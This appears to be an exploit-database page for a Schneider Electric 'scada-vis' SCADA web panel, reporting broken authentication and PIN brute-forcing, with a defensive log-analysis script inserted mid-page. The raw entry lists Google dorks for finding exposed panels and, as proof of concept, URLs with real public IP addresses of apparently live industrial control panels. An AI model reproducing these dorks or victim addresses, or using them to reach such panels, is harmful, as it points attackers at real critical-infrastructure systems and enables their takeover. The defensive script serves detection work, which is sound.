vendor:
by: parsa rezaie khiabanloo
CVSS: 7.5 (HIGH)
CWE: Directory traversal & Broken Authentication
Product Name:
Affected Version From: all-versions
Affected Version To: all-versions
Patch Exists:
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows/Linux/Android
2023

Schneider Electric v1.0 – Directory traversal & Broken Authentication

An attacker can use these dorks to access the panel without a password: inurl:/cgi-bin/scada-vis/, inurl:/scada-vis/schedulers, inurl:/cgi-bin/scada-vis/index.cgi, inurl:/scada-vis, inurl:/cgi-bin/scada-vis/touch.html. An attacker can use this dork to brute-force the panel: inurl:/scada-vis/pin?return=index.
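A defender's check for the exposure described above, as an added example that is not part of the original entry: it scans web access logs for requests to the scada-vis paths from outside trusted networks and for bursts of requests to the PIN page. The Common Log Format input, the trusted network, the thresholds and the sample lines are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

# Paths taken from the dorks listed on this page.
PANEL_PREFIXES = ("/scada-vis", "/cgi-bin/scada-vis")
PIN_PATH = "/scada-vis/pin"
# Assumptions: trusted management network and brute-force threshold.
TRUSTED_NETS = [ip_network("10.0.0.0/8")]
PIN_LIMIT, PIN_WINDOW = 5, timedelta(seconds=60)
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"[A-Z]+ (?P<path>\S+) [^"]*" \d{3}')

def parse(line):
    m = LOG_RE.match(line)
    try:
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        return ip_address(m["ip"]), ts, m["path"].split("?", 1)[0]
    except (TypeError, ValueError):  # no match, bad timestamp, non-IP client
        return None

def analyze(lines):
    """Return (untrusted sources reaching the panel, sources hammering the PIN page)."""
    external, brute = set(), set()
    recent = defaultdict(deque)  # source IP -> timestamps of PIN-page requests
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ip, ts, path = rec
        if not any(path == p or path.startswith(p + "/") for p in PANEL_PREFIXES):
            continue
        if not any(ip in net for net in TRUSTED_NETS):
            external.add(str(ip))
        if path == PIN_PATH:
            q = recent[ip]
            q.append(ts)
            while ts - q[0] > PIN_WINDOW:  # keep only hits inside the window
                q.popleft()
            if len(q) >= PIN_LIMIT:
                brute.add(str(ip))
    return external, brute

# Constructed sample log (documentation address ranges), not real traffic.
SAMPLE = [
    '10.1.2.3 - - [11/Mar/2023:10:00:00 +0000] "GET /scada-vis/schedulers HTTP/1.1" 200 512',
    '203.0.113.7 - - [11/Mar/2023:10:00:05 +0000] "GET /cgi-bin/scada-vis/index.cgi HTTP/1.1" 200 2048',
] + [f'198.51.100.9 - - [11/Mar/2023:10:01:{s:02d} +0000] "POST /scada-vis/pin?return=index HTTP/1.1" 200 90'
     for s in range(0, 12, 2)]
```

Any source reported in the first set means the panel is reachable from outside the management network and should be placed behind a firewall or VPN.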

Mitigation:

Source

Exploit-DB raw data:

# Exploit Title: Schneider Electric v1.0 - Directory traversal & Broken Authentication 
# Google Dork: inurl:/scada-vis 
# Date: 3/11/2023
# Exploit Author: parsa rezaie khiabanloo
# Vendor Homepage: https://www.se.com/
# Version: all-versions
# Tested on: Windows/Linux/Android

# An attacker can use these dorks to access the panel without a password

inurl:/cgi-bin/scada-vis/

inurl:/scada-vis/schedulers

inurl:/cgi-bin/scada-vis/index.cgi

inurl:/scada-vis 

inurl:/cgi-bin/scada-vis/touch.html

POC :

http://185.73.103.144:8080/cgi-bin/scada-vis/index.cgi

http://185.73.103.38:8080/cgi-bin/scada-vis/touch.html

http://88.213.153.98/cgi-bin/scada-vis/schedulers.cgi


# An attacker can use this dork to brute-force the panel

inurl:/scada-vis/pin?return=index

POC : 

http://143.176.129.1/scada-vis/pin?return=index

http://62.163.74.206/scada-vis/pin?return=touch